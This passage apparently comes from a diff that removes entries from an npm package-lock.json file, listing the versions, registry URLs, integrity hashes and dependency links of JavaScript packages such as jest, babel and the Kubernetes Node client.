"sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "dependencies": { - "@types/node": { - "version": "20.8.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.8.10.tgz", - "integrity": "sha512-TlgT8JntpcbmKUFzjhsyhGfP2fsiz1Mv56im6enJ905xG1DAYesxJaeSbGqQmAw8OWPdhyJGhGSQGKRNJ45u9w==", - "requires": { - "undici-types": "~5.26.4" - } - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/ip-address": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", - "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", - "dev": true, - "requires": { - "ip-address": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" - }, - "@types/lodash": { - "version": "4.14.195", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", - "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", - "dev": true - }, - "@types/node": { - "version": "16.18.38", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.18.38.tgz", - "integrity": "sha512-6sfo1qTulpVbkxECP+AVrHV9OoJqhzCsfTNp5NIG+enM4HyM3HvZCO798WShIXBN0+QtDIcutJCjsVYnQP5rIQ==" - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "requires": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/tough-cookie": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.2.tgz", - "integrity": "sha512-Q5vtl1W5ue16D+nIaW8JWebSSraJVlK+EthKn7e7UcD4KWsaSJ8BqGPXNaPghgtcn/fhvrN17Tv8ksUsQpiplw==" - }, - "@types/ws": { - "version": "8.5.5", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.5.tgz", - "integrity": "sha512-lwhs8hktwxSjf9UaZ9tG5M03PGogvFaH8gUgLNbN9HKIg0dvv6q+gkSuJ8HN4/VbyxkuLzCjlN7GquQ0gUJfIg==", - "requires": { - "@types/node": "*" - } - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==" - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": 